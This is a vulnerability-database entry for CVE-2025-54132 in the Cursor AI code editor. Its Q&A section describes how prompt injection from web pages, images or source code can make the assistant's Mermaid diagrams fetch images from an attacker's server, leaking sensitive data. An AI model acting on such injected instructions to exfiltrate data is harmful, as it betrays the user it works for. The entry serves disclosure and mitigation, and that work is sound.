CVE-2025-54132
BaseFortify
Publication date: 2025-08-01
Last updated on: 2025-08-25
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| anysphere | cursor | to 1.3 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
| CWE-NVD-CWE-noinfo |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Cursor versions below 1.3, where the Mermaid diagram rendering feature allows embedding images that get rendered in the chat box. An attacker can exploit this by performing a prompt injection, causing Cursor to fetch an image from an attacker-controlled server, thereby exfiltrating sensitive information. This can also be triggered by a malicious model or backdoor. The vulnerability requires prompt injection from malicious data sources such as web input, image uploads, or source code. It is fixed in version 1.3.
How can this vulnerability impact me? :
The vulnerability can lead to sensitive information being sent to an attacker-controlled external server without user consent or knowledge. This can result in data leakage and compromise of confidential information if an attacker successfully performs prompt injection or uses a malicious model to trigger the exploit.
What immediate steps should I take to mitigate this vulnerability?
Upgrade Cursor to version 1.3 or later, as this version contains the fix for the vulnerability. Additionally, avoid processing untrusted or malicious prompt data that could trigger prompt injection.